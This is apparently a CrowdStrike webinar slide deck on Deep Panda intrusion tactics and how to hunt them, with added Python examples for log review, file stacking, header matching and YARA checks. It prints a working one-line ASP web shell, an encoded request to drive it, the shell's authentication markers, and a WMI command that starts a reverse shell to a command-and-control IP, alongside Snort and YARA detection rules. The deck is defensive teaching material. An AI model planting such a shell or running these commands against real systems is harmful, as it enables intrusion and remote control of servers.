CrowdCasts Monthly: Going Beyond the Indicator
Agenda
• Introductions
• Typical Attacker TTPs
• Case Studies
• New Tactics Explained
• Hunting and Detecting
• Best Practice Preparations
• Resources / Q & A
© 2014 CrowdStrike, Inc. All rights reserved. 2
@CROWDSTRIKE | #CROWDCASTS
Today's Speakers

Danny Lungstrom (LinkedIn: Danny Lungstrom)
Prior to CrowdStrike: 8+ years at Stroz Friedberg, AT&T, The Aerospace Corporation and CERT/CC; incident response, forensic analysis, and risk assessments.

Justin J. Weissert (LinkedIn: Justin Weissert, Twitter: @JJWeissert)
Prior to CrowdStrike: 7+ years at KPMG LLP (Information Protection and Business Resiliency); performing security assessments, auditing and remediating environments, and developing security programs/strategies.

Ryan Jafarkhani (LinkedIn: Ryan Jafarkhani, Twitter: @rj_jafar)
Prior to CrowdStrike: 5+ years at RSA NetWitness, Mandiant and Beckman Coulter; auditing, conducting incident response investigations, network forensics, computer forensics and malware analysis.
Who is CrowdStrike?
CrowdStrike is a global provider of security technologies and services focused on
identifying advanced threats and targeted attacks. Using big-data technologies,
CrowdStrike’s next-generation threat protection platform enables enterprises to identify
unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide
attribution.
What do we do?
• Technology: endpoint threat detection & response; continuous endpoint activity monitoring & real-time forensics
• Services: proactive & incident response services
• Intelligence: cyber threat intelligence & attribution
About CrowdStrike Services
• Comprehensive offerings: incident response investigations, proactive threat assessments, IR program development
• Industry veterans: average of ten years IR industry experience; backgrounds in IR consulting, government, and defense; specialists in a broad range of technologies
• Variety of customer verticals: finance, technology, manufacturing, retail, healthcare, telecommunications, oil & gas, entertainment
Who (adversary), why (intent), what (malware, industry): and there are a lot of adversaries.
Adversary groups our Intelligence team tracks (slide figure: adversary origins listed were China, Iran, India, Russia and crime syndicates; targeted sectors listed were commercial, government and non-profit organizations, the financial sector, technology, electronics & communications, telecom, defense & aerospace, industrial engineering, energy and oil & gas companies, legal, media, G20 bodies, NGOs and dissident groups).
TYPICAL ATTACKER TTPS
Typical - Attacker TTPs
• Initial Attack Vector
• Malware
– Persistence Mechanism
– Command & Control
– Functionality
• Lateral Movement
• Data Extraction/Theft
Shift in Attacker TTPs
• Initial Attack Vector
  – Historical: spearphish and vulnerable external-facing applications (most common)
  – Current: no significant change
• Malware – Persistence Mechanism
  – Historical: installed as a service, Run key, etc.
  – Current: no persistence
• Malware – Command & Control
  – Historical: beacon to a malicious IP or domain
  – Current: no standard beacon activity
• Malware – Functionality
  – Historical: simple; provides a shell or basic upload/download functionality
  – Current: robust; includes all required functionality and commands
• Malware – Location
  – Historical: written to disk
  – Current: memory-resident
• Lateral Movement
  – Historical: net use, RDP or utilities (e.g. PsExec)
  – Current: WMI, service accounts
• Obfuscation
  – Historical: timestomp the standard times only (the $STANDARD_INFORMATION timestamps, which the Windows API can set)
  – Current: timestomp both the standard and the file-name times ($STANDARD_INFORMATION via the Windows API and $FILE_NAME via direct MFT manipulation), so the usual API-vs-MFT timestamp comparison no longer exposes the change
• Data Extraction
  – Historical: compress data and send it to a compromised host provider
  – Current: no significant change
• Last Hop Communication
  – Historical: source-country IPs (most often Chinese, Russian, Iranian)
  – Current: North American IPs, anonymous VPN solutions, cloud
Catalyst for Change
• Shifts in tactics follow increased intel sharing:
  – Whitepapers
  – Blog posts
  – Conference demos
  – VirusTotal
  – US Government JIB (Joint Indicator Bulletin)
• Pros
  – Increased awareness / detection for public companies
  – Decreased intel gap for smaller organizations
  – Increased costs for attackers to change TTPs
• Cons
  – Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure)
  – Attacks become more advanced to avoid current methods of detection
  – Reduces visibility into what the attacker is doing and/or targeting
CASE STUDIES
Case Studies - Background
• Company #1
– Company compromised in 2012 using historical TTPs
– Partial Remediation February 2013
– Re-Compromise March 2013 with new TTPs
• Company #2
– Compromised March 2013
– New TTPs from Company 1 re-compromise were observed
Timeline (February to April 2013, in slide order)
• Company #1 investigation commences: traditional tactics
• Intel community shares; TTPs shared widely
• Company #1 partial remediation (February 2013): logging and monitoring of the old tactics
• Company #1 re-compromised (March 2013): new tactics
• Company #2 investigation commences (March 2013): new tactics
NEW TACTICS EXPLAINED
Deep Panda – Simple Web Shell
• 28-byte web shell:
  <%execute request(chr(42))%>
• Active Server Page (classic ASP) file
  – chr(42) is "*", so the shell reads whatever the request carries in a parameter named "*"; Request() with no collection name searches the query string, form body and cookies, so the script can arrive by GET, POST or cookie
  – Expected input is VBScript code, percent-encoded (each character sent as %XX)
• The Execute statement runs any VBScript passed to it
  – Upload / download files
  – Execute arbitrary commands (including WMI)
  – Full access to the file system (with the rights of the web server's worker process identity)
• Controlled by an attacker "thick client"
As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write("<h1>Hello World</h1>") and would render "Hello World" in the web browser:

http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29
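To make the encoding concrete, the following is an added example (not code from the deck or from CrowdStrike): it produces the percent-encoded form shown above from a VBScript string, recovers the script from a logged URL, and flags decoded scripts that reference common VBScript/ASP objects. The sample URL is the one on the slide; the keyword list is an assumption for hunting and not something the deck specifies.

```python
# Added example, not from the deck or CrowdStrike. The 28-byte ASP shell reads
# VBScript from a request parameter named "*" (chr(42)) and runs it with Execute.
from urllib.parse import parse_qs

# The URL from the slide, joined into one line.
SLIDE_URL = (
    "http://<webserver>/showimage.asp?*="
    "%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E"
    "%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29"
)

# VBScript / ASP identifiers that usually appear when a shell is used for more
# than "Hello World" (assumed hunting list; extend it for your environment).
SUSPICIOUS_VBSCRIPT = (
    "Response.Write", "CreateObject", "WScript.Shell",
    "Scripting.FileSystemObject", "winmgmts:", "Execute", "Eval(",
)


def encode_payload(vbscript: str) -> str:
    """Encode every character as %XX, the form the slide shows on the wire."""
    return "".join("%%%02X" % b for b in vbscript.encode("ascii"))


def decode_request(url: str, param: str = "*"):
    """Return the decoded value of request parameter `param` from a URL, or None.

    Only the query string is visible in a URL; the thick client can just as
    easily send "*" in a POST body or a cookie, which a URL-only check misses.
    parse_qs also decodes an encoded parameter name, so "%2A=" is found too.
    """
    if "?" not in url:
        return None
    query = url.split("?", 1)[1]
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


def suspicious_keywords(vbscript: str) -> list:
    """Entries of SUSPICIOUS_VBSCRIPT present in a decoded script."""
    return [k for k in SUSPICIOUS_VBSCRIPT if k in vbscript]


if __name__ == "__main__":
    script = decode_request(SLIDE_URL)
    print("decoded :", script)
    print("keywords:", suspicious_keywords(script))
    # Round trip: encoding the decoded script reproduces the slide's query.
    assert encode_payload(script) == SLIDE_URL.split("*=", 1)[1]
```

When hunting in IIS logs, remember that cs-uri-query is recorded as the client sent it, so the parameter name may appear as `*` or as `%2A`; decode before matching.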
Deep Panda – Complex Web Shell
•  Ability to impersonate a user (with valid credentials)
•  Eight different commands
–  File system, SQL server, and Active Directory requests
–  Upload / download files
–  Compile and execute any C# code
Web Shell Authentication
• Rudimentary (but effective) authentication for incoming connections: the shell only responds when one of the following is present
  – a cookie named 'zWiz'
  – or the request header Keep-Alive: 320
  – or a language header (e.g. Accept-Language) containing es-DN, which is not a valid language tag
• Prevents identification via search engine indexing or vulnerability scanning, since crawlers and scanners send none of these
Web Shells – But Why?
• Primary foothold back into the victim organization
• Less reliant on malware installed on systems and beaconing to a C2
• Why?
  – Low to virtually no detection by antivirus products
  – No command and control beacon traffic
  – Blocking known malicious IP addresses at the web server is ineffective, since the adversary can easily change their source IP address
  – Cookie- and HTTP-header-aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
Second Stage Malware
(slide figure: adversary → anonymous VPN or proxy → web shell on the web server; the web shell is used to upload malware, which is then executed from the web shell for lateral movement and data theft, reaching the C2 infrastructure from inside the network)
Why?
• No command and control beacon activity
• Change IP/domain on the fly
• Runs in memory
• Limits forensic artifacts
Lateral Movement
(slide figure: adversary → anonymous VPN or proxy → web shell on the web server → WMI to Host 2; Host 2 connects out to C2 infrastructure at 59.111.22.222)

Command launched through the web shell (host name, credentials and IP are the slide's example values; backslashes lost in extraction restored):

  System32\cmd.exe - c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p "P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:"C:\bad.exe /f sh /s 59.111.22.222 /p 443"

Read: the attacker's tool in wmi mode calls Win32_Process.Create on Host2 with a local administrator credential; the process it creates is the same tool in shell (sh) mode, connecting out to the C2 on port 443.

• Leverage WMI
• Custom VBScript "PsExec" utility
  – 4 KB script to remotely launch a process as a specified user
  – Usage (from the slide): cscript.exe – Username Password RemoteHost ProcessPath
• Why WMI?
  – Evades most typical logging
  – Shows up as the WMI service: on the target the new process is a child of the WMI provider host (WmiPrvSE.exe), not a freshly installed service as with PsExec
  – Powerful functionality, built into Windows
HUNTING AND DETECTING
Go Beyond the Indicator
• New evil requires new approaches for detection
• Look through multiple haystacks for a single needle
– The evil stands out with the right methodology
• Blog series
– Mo’ Shells Mo’ Problems
http://www.crowdstrike.com/blog/
Hunting – WMI Activity
• Windows XP and Server 2003 had limited logging
  – %systemroot%\system32\wbem\logs
• Windows 7 and Server 2008 do NOT log WMI activity by default
  – Help investigators help you: enable it ahead of time
    wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true
  – Review WMITracing.log via Event Viewer. The Trace channel is an analytic log, so it is hidden until "Show Analytic and Debug Logs" is enabled in the View menu, and it is a small circular buffer: forward or export it rather than expecting it to survive until an investigation starts.
• Be familiar with your environment's use of WMI, so that legitimate management traffic can be excluded
Hunting Web Shells – Identifying Intrusion Points
• Web shells are often one of the earliest stages of malware
• Search for activity on the system near the first known
compromise time
– Successful web scans in logs
– SQL injection
– Dropper malware
– Lateral movement from other compromised systems
– Pages created or modified within the webserver document root
2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
Hunting Web Shells – File Stacking
• File stacking is based on the concept of least frequency of occurrence
• Collect files from all of your web servers and investigate outliers
  – What files do not exist on other web servers?
  – PHP|JSP|ASP|ASPX|CFM
Hunting Web Shells – Web Log Review
• Perform statistical analysis of page requests and search for
outliers
– See exactly when the web shells were in use via the web logs
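The following added example (not code from the deck or from CrowdStrike) covers the three hunting slides above in one script: least-frequency-of-occurrence stacking applied to script files across a web farm and to requested pages in web logs, plus the intrusion-point checks (SQL injection probes, use of the "*" parameter the simple ASP shell reads, and activity around a known compromise time). The log lines and directory listings are constructed; the field order is a simplified W3C layout (date time method uri-stem uri-query port username client-ip), not a claim about any server's default format, and the SQL injection patterns are an assumed starter list.

```python
# Added example, not from the deck or CrowdStrike.
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus
import re

# Constructed sample log; 203.0.113.7 plays the attacker.
SAMPLE_LOG = """\
2013-08-25 13:00:30 GET index.aspx - 80 - 10.0.0.3
2013-08-25 13:01:10 GET index.aspx - 80 - 10.0.0.5
2013-08-25 13:02:41 GET item-details.aspx id=17 80 - 10.0.0.9
2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- 80 - 203.0.113.7
2013-08-25 13:04:20 GET item-details.aspx id=1%27%20union%20select%20null-- 80 - 203.0.113.7
2013-08-25 13:06:05 POST showimage.asp - 80 - 203.0.113.7
2013-08-25 13:06:09 GET showimage.asp *=%52%65%73%70%6F%6E%73%65 80 - 203.0.113.7
2013-08-25 13:07:00 GET index.aspx - 80 - 10.0.0.12
2013-08-25 13:07:30 GET item-details.aspx id=42 80 - 10.0.0.12
"""

# Constructed listings: host -> script files under its document root.
SAMPLE_LISTINGS = {
    "web01": {"default.aspx", "item-details.aspx", "login.aspx", "showimage.asp"},
    "web02": {"default.aspx", "item-details.aspx", "login.aspx"},
    "web03": {"default.aspx", "item-details.aspx", "login.aspx", "status.aspx"},
}

# Crude SQL injection probe patterns, matched against the decoded query (assumed list).
SQLI_RE = re.compile(r"'\s*(or|and|union)\s|@@version|--\s*$", re.I)


def parse_line(line: str) -> dict:
    date, time, method, stem, query, port, user, ip = line.split()
    return {
        "ts": datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S"),
        "method": method, "stem": stem,
        "query": "" if query == "-" else unquote_plus(query),   # decode before matching
        "port": port, "user": user, "ip": ip,
    }


def parse_log(text: str) -> list:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def stack(values) -> list:
    """Least frequency of occurrence: (value, count) pairs, rarest first."""
    return sorted(Counter(values).items(), key=lambda kv: (kv[1], kv[0]))


def rare_stems(records: list, max_hits: int = 1) -> list:
    """Pages requested at most max_hits times; a shell is rarely a popular page."""
    return [stem for stem, n in stack(r["stem"] for r in records) if n <= max_hits]


def stack_files(listings: dict, max_hosts: int = 1) -> dict:
    """File stacking: files present on at most max_hosts servers -> those hosts."""
    seen = defaultdict(set)
    for host, files in listings.items():
        for f in files:
            seen[f].add(host)
    return {f: sorted(h) for f, h in seen.items() if len(h) <= max_hosts}


def flag_requests(records: list) -> list:
    """(timestamp, client ip, finding, page) for SQLi probes and '*' parameter use."""
    findings = []
    for r in records:
        if r["query"].startswith("*="):           # "%2A=" decodes to "*=" as well
            findings.append((r["ts"], r["ip"], "asp-star-param", r["stem"]))
        elif SQLI_RE.search(r["query"]):
            findings.append((r["ts"], r["ip"], "sqli-probe", r["stem"]))
    return findings


def around(records: list, when: datetime, minutes: int = 5) -> list:
    """Requests within +/- minutes of a known compromise time."""
    lo, hi = when - timedelta(minutes=minutes), when + timedelta(minutes=minutes)
    return [r for r in records if lo <= r["ts"] <= hi]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for f in flag_requests(recs):
        print(*f)
    print("rare pages   :", rare_stems(recs, max_hits=2))
    print("outlier files:", stack_files(SAMPLE_LISTINGS))
    first_probe = flag_requests(recs)[0][0]
    print("requests within 3 min of first probe:", len(around(recs, first_probe, minutes=3)))
```

Outliers are leads, not verdicts: in the sample, status.aspx is just as much a file-stacking outlier as showimage.asp, so every outlier still has to be triaged (creation time against the web log, content review, who deployed it).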
Hunting Web Shells – Network Monitoring
• Stack web requests from network data
• Leverage cyber intelligence feeds to detect known web shells
  – Unique header attributes
  – HTML used to produce the shell

Example Snort rule from the slide (sid and rev left as placeholders):

alert tcp $EXTERNAL_NET any -> $WEB_SERVERS $HTTP_PORTS (msg:"CrowdStrike Deep Panda CSharp Webshell Headers"; content:"Keep-Alive: 320"; http_raw_header; content:"es-DN"; http_raw_header; flow:established,to_server; classtype:trojan-activity; metadata:service http; sid:xxx; rev:xxx;)

Note that multiple content matches in one Snort rule are ANDed: this rule fires only when a request carries both Keep-Alive: 320 and es-DN, while the shell itself accepts any one of its three markers (the zWiz cookie, Keep-Alive: 320, or es-DN). Write one rule per marker if you want to catch a client that presents only one of them.
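The following added example (not code from the deck or from CrowdStrike) applies the three authentication markers from the Web Shell Authentication slide to raw HTTP requests and shows the difference between matching any marker and the all-markers semantics of the Snort rule above. The requests are constructed samples; the header name Accept-Language is an assumption, since the slide only says "language header", so any header with "language" in its name is inspected.

```python
# Added example, not from the deck or CrowdStrike.
import re


def parse_request(raw: bytes):
    """Split a raw HTTP request into (request line, {lowercased header: [values]})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def webshell_auth_markers(headers: dict) -> set:
    """Return which of the shell's three authentication markers are present."""
    hits = set()
    for cookie in headers.get("cookie", []):
        if re.search(r"(^|;\s*)zWiz=", cookie):          # cookie named zWiz
            hits.add("cookie:zWiz")
    if any(v == "320" for v in headers.get("keep-alive", [])):   # exact value only
        hits.add("keep-alive:320")
    for name, values in headers.items():                 # any *language* header
        if "language" in name and any("es-DN" in v for v in values):
            hits.add("language:es-DN")
    return hits


def matches_any_marker(raw: bytes) -> bool:
    """What the shell accepts: any ONE marker opens the door."""
    return bool(webshell_auth_markers(parse_request(raw)[1]))


def matches_snort_rule(raw: bytes) -> bool:
    """Semantics of the slide's Snort rule: both header contents must be present."""
    hits = webshell_auth_markers(parse_request(raw)[1])
    return {"keep-alive:320", "language:es-DN"} <= hits


# Constructed sample requests.
REQ_COOKIE_ONLY = (b"POST /showimage.aspx HTTP/1.1\r\nHost: www.example.com\r\n"
                   b"Cookie: ASP.NET_SessionId=abc123; zWiz=1\r\n"
                   b"Content-Length: 0\r\n\r\n")
REQ_HEADERS = (b"POST /showimage.aspx HTTP/1.1\r\nHost: www.example.com\r\n"
               b"Keep-Alive: 320\r\nAccept-Language: es-DN\r\n"
               b"Content-Length: 0\r\n\r\n")
REQ_BENIGN = (b"GET /index.aspx HTTP/1.1\r\nHost: www.example.com\r\n"
              b"Keep-Alive: timeout=5, max=100\r\nAccept-Language: en-US,en;q=0.8\r\n"
              b"Cookie: ASP.NET_SessionId=abc123\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("cookie-only", REQ_COOKIE_ONLY), ("headers", REQ_HEADERS), ("benign", REQ_BENIGN)]:
        print(name, sorted(webshell_auth_markers(parse_request(req)[1])),
              "any:", matches_any_marker(req), "snort-rule:", matches_snort_rule(req))
```

The cookie-only request is accepted by the shell but never trips the Snort rule as written, which is the gap the per-marker rules close. Because the markers are static, they are also cheap for the adversary to change; treat them as a signature for this specific shell, not as a general web shell detection.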
  
Hunting – Memory Resident Malware
• “Fileless” Forensics Fun
• Persistence, We Don’t Need No Stinkin’ Persistence
• New Approach to Malware Means New Approach to Forensics
• Hidden, Not Invisible
• What’s Normal and What’s New?
– Get to know your systems
– Image memory, review, rinse and repeat
Hunting with YARA
• YARA signatures can be used to search your enterprise for specific patterns on disk and in memory

Rule from the slide (the $marker2 string is rejoined onto one line and its embedded quotes escaped so the rule compiles):

rule CrowdStrike_13091_01 : deep_panda alice RAT
{
    meta:
        description = "Detection of Mad Hatter .NET RAT"
        last_modified = "2013-10-08"
        version = "1.1"
        in_the_wild = true
        copyright = "CrowdStrike, Inc"
        report = "CSIT-13091"
    strings:
        $marker1 = "alice'srabbithole" wide
        $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\":\"{2}\",\"tm\":\"{3}\",\"tz\":{4}}}" wide
        $marker3 = "InstManager.pdb"
        $marker4 = "<osVersion>"
        $marker5 = "<tm>"
        $marker6 = "<tz>"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*)
}

The condition first requires a PE file (an "MZ" DOS header whose e_lfanew field at offset 0x3C points at a "PE\0\0" signature) and then any two of the markers; "wide" makes a string match its UTF-16LE encoding, which is how .NET string literals are stored.
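To show exactly what that condition tests, the following is an added example (not code from the deck or from CrowdStrike, and not a substitute for YARA itself): it re-implements the rule's PE check, the "wide" modifier and the "2 of" count in plain Python and runs them over a constructed blob with a fake PE header. The blob builder and its layout are assumptions for the demonstration.

```python
# Added example, not from the deck or CrowdStrike.
import struct

# The rule's strings: text and whether they carry the "wide" (UTF-16LE) modifier.
MARKERS = {
    "marker1": ("alice'srabbithole", True),
    "marker2": ('{{"Version":{0},"HostName":"{1}","osVersion":"{2}","tm":"{3}","tz":{4}}}', True),
    "marker3": ("InstManager.pdb", False),
    "marker4": ("<osVersion>", False),
    "marker5": ("<tm>", False),
    "marker6": ("<tz>", False),
}


def is_pe(data: bytes) -> bool:
    """uint16(0) == 0x5A4D ('MZ') and uint32(uint32(0x3C)) == 0x00004550 ('PE\\0\\0')."""
    if len(data) < 0x40:
        return False
    if struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return struct.unpack_from("<I", data, e_lfanew)[0] == 0x00004550


def matching_markers(data: bytes) -> list:
    """Names of the rule's strings found in data, honouring the wide modifier."""
    hits = []
    for name, (text, wide) in MARKERS.items():
        needle = text.encode("utf-16-le") if wide else text.encode("ascii")
        if needle in data:
            hits.append(name)
    return hits


def rule_matches(data: bytes) -> bool:
    """The full condition: PE header and at least 2 of ($marker*)."""
    return is_pe(data) and len(matching_markers(data)) >= 2


def build_sample(markers: list) -> bytes:
    """Construct a minimal PE-looking blob: 'MZ', e_lfanew -> 'PE\\0\\0', then strings.

    markers is a list of (text, wide) pairs; this is a test fixture, not a
    valid executable.
    """
    header = bytearray(0x40)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)      # e_lfanew = 0x40
    body = b"PE\0\0"
    for text, wide in markers:
        body += b"\0\0" + (text.encode("utf-16-le") if wide else text.encode("ascii"))
    return bytes(header) + body


if __name__ == "__main__":
    sample = build_sample([("alice'srabbithole", True), ("InstManager.pdb", False)])
    print("PE:", is_pe(sample), "markers:", matching_markers(sample), "match:", rule_matches(sample))
    # The same marker1 text stored as ASCII does not satisfy a "wide" string.
    narrow = build_sample([("alice'srabbithole", False), ("InstManager.pdb", False)])
    print("ASCII marker1 -> markers:", matching_markers(narrow), "match:", rule_matches(narrow))
```

The ASCII case is the practical lesson: a rule written with "wide" only will miss the same text in a non-.NET sample, and one written without it will miss .NET string literals, so sweep memory and disk with the modifier that fits the target (or use "ascii wide" when both are plausible).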
CrowdResponse
• Free CrowdStrike Community Tool
• Collect and Analyze Artifacts Across Your Enterprise
• Available Modules
– DirList
– YARA
– PSList
• Many Modules Coming Soon
http://www.crowdstrike.com/community-tools/
BEST PRACTICE PREPARATIONS
Best Practices
• Proactive Defense of Your Network
– Isolate Critical Assets with Network Segmentation
– Consolidate and Monitor Internet Egress Points
– Implement Centralized Logging
– Patch, Patch, and Patch Again
– Secure Web Applications and Internal Software Projects
– Minimize or Remove Local Admin Privileges
– Implement a Tiered Active Directory Admin Model
– Incorporate Cyber Intelligence Feeds
CrowdStrike Can Help!
• Services to Consider
– Tabletop Assessments (Yearly at Least)
•  Keep your team primed and educated on latest attack vectors
– Next-Gen Penetration Testing
•  More than just a cursory glance, take a real-world scenario approach
– Incident Response, Disaster Recovery and Business Continuity Plans
•  CrowdStrike knowledge and experience can help you improve/build plans
– Incident Response Services Retainer
•  Avoid paperwork related time delays
• CrowdStrike Intelligence Subscription
– Stay Up To Date with Latest Attacker TTPs
CROWDSTRIKE RESOURCES
CrowdStrike Global Threat Report
• Adversary activity analysis and
predictions
• Look back at 2013
• Predictive trends for 2014
• Threat actor profiles and TTPs
• Get it on crowdstrike.com
(slide figure: CrowdStrike Services, alongside Technology and Intelligence, is split into Proactive Response Services and Incident Response Services)
CrowdStrike Services
• Proactive Response Services: Counter Threat Assessment, IR Program Development, Next-Gen Pen Testing, Tabletop Assessment, InfoSec Capability Maturity Model, Adversary Assessments
• Incident Response Services: Computer Forensic Analysis, Litigation Support, Expert Witness Testimony, Remediation, Malware Analysis
Falcon Intelligence: Threat Intelligence Subscription
1. Government-quality intelligence developed using an 'all-source model'
2. Detailed technical and strategic analysis of 50+ adversaries' capabilities, indicators and tradecraft, attribution and intentions
3. Customizable feeds and API for indicators of compromise
4. Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution
5. Tailored Intelligence feature provides visibility into breaking events that matter to an organization's brand, infrastructure, and customers
Falcon Host: Endpoint Threat Detection & Response
1. Identifies unknown malware & detects zero-day threats
2. Captures and correlates system events to identify adversary activity in real time
3. Maximum visibility across the full kill chain allows for insight into past & current attacks
4. Context-based detection does not rely on signatures or easily changed IOCs
5. Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack
Falcon Host: Continuous Endpoint Activity Monitoring
1. Explore rich execution data collected by the Falcon Host sensors
2. Dashboards provide an at-a-glance view of recent activity for investigative purposes
3. Expert-designed menu of queries provides the ability to proactively hunt for malicious activity
Q & A

Next CrowdCast: Operationalizing Intelligence
Adam Meyers – Director, Intelligence
Elia Zaitsev – Senior Sales Engineer
April 29th | 2PM ET/11AM PT

Scalar Security Roadshow - Vancouver PresentationScalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Decisions
 
Scalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Decisions
 
Cybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond ComplianceCybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond ComplianceEnergySec
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromPROIDEA
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsZivaro Inc
 
Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014Imperva
 
Emulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect IntelligenceEmulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect IntelligenceAdam Pennington
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE - ATT&CKcon
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCDefending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCCloudflare
 

Ähnlich wie CrowdCasts Monthly: Going Beyond the Indicator (20)

Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
Brian Isle: The Internet of Things: Manufacturing Panacea - or - Hacker's Dream?
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian2016, A New Era of OS and Cloud Security - Tudor Damian
2016, A New Era of OS and Cloud Security - Tudor Damian
 
Year of pawnage - Ian trump
Year of pawnage  - Ian trumpYear of pawnage  - Ian trump
Year of pawnage - Ian trump
 
10th SANS ICS Security Summit Project SHINE Presentation
10th SANS ICS Security Summit Project SHINE Presentation10th SANS ICS Security Summit Project SHINE Presentation
10th SANS ICS Security Summit Project SHINE Presentation
 
[CLASS 2014] Palestra Técnica - Fabio Rosa
[CLASS 2014] Palestra Técnica - Fabio Rosa[CLASS 2014] Palestra Técnica - Fabio Rosa
[CLASS 2014] Palestra Técnica - Fabio Rosa
 
Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2Fighting cyber fraud with hadoop v2
Fighting cyber fraud with hadoop v2
 
2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security2016, A new era of OS and Cloud Security
2016, A new era of OS and Cloud Security
 
Scalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver Presentation
 
Scalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary Presentation
 
Cybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond ComplianceCybersecurity for Energy: Moving Beyond Compliance
Cybersecurity for Energy: Moving Beyond Compliance
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
